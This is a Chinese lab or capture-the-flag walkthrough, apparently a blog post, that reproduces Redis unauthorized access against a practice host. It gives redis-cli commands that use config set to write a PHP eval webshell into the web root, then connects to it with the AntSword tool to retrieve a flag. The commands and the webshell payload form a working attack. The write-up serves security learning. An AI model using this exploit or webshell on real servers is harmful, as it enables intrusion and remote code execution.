redis未授权访问漏洞复现

一,漏洞介绍

攻击者在未授权访问Redis的情况下,利用Redis自身的提供的config命令,可以进行写文件操作,攻击者还可以成功将自己的ssh公钥写入目标服务器的/root/.ssh文件的authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务器登录目标服务器
漏洞的产生条件有以下两点:

(1) Redis绑定在6379端口,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网

(2) 没有设置密码认证(默认为空)或者弱密码,可以免密码登录redis服务

二,漏洞复现

1,打开kali虚拟机,安装redis-cli远程连接工具
wget http://download.redis.io/redis-stable.tar.gz
tar -zxvf redis-stable.tar.gz
cd redis-stable
make
cp src/redis-cli /usr/bin/

2,测试目标网站

-h 目标url地址 -p redis端口号
redis-cli -h lqm2mltk.lab.aqlab.cn -p 6379

输入ping返回PONG则成功连通,输入info即可查看redis信息

3,利用config写webshell

写入目录地址config set dir /var/www/html

webshell文件名config set dbfilename aaa.php

写入一句话木马(写入文件内容时添加几个换行,是因为redis写入文件时会自带一些版本信息,若不换行可能会导致木马无法正常执行)
set webshell "\r\n\r\n<?php phpinfo();eval(@$_POST['ydop']);?>\r\n\r\n"

保存save退出exit

访问webshell地址,ok 成功

(ps:昨晚木马已经写入了,连接的时候突然有这个连接认证,网上搜了一堆资料还以为是我木马写错导致的,今天才知道原来是管理员弄得认证)账号密码:zkaq

4,使用webshell管理工具连接木马

访问webshell时会认证,输入正确的账号密码才能访问

抓包发现,关键字是这一串 Authorization,删除掉这个值则无法访问

我用的是中国蚁剑,因为添加请求头更方便

输入木马地址

输入cookie值,连接

终于

查找flag

没错,flag就在这里

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

相关推荐
qq_3181215919 分钟前
互联网大厂Java面试故事:从Spring Boot到微服务架构的技术挑战与解答
java·spring boot·redis·spring cloud·微服务·面试·内容社区
计算机毕设VX:Fegn089526 分钟前
计算机毕业设计|基于springboot + vue医院设备管理系统(源码+数据库+文档)
数据库·vue.js·spring boot·后端·课程设计
Mr__Miss29 分钟前
保持redis和数据库一致性(双写一致性)
数据库·redis·spring
Knight_AL2 小时前
Spring 事务传播行为 + 事务失效原因 + 传播行为为什么不用其他模式
数据库·sql·spring
倔强的石头_2 小时前
时序数据时代的“存储与分析困局”解析及金仓解决方案
数据库
计算机毕设VX:Fegn08952 小时前
计算机毕业设计|基于springboot + vue小型房屋租赁系统(源码+数据库+文档)
数据库·vue.js·spring boot·后端·课程设计
倔强的石头_3 小时前
场景化落地指南——金仓时序数据库在关键行业的应用实践
数据库
SelectDB3 小时前
驾驭 CPU 与编译器:Apache Doris 实现极致性能的底层逻辑
运维·数据库·apache
zbguolei3 小时前
MySQL根据身份证号码计算出生日期和年龄
数据库·mysql
马克学长4 小时前
SSM校园图书借阅服务系统jd2z8(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面
数据库·图书管理系统·ssm 框架·ssm 校园图书借阅系统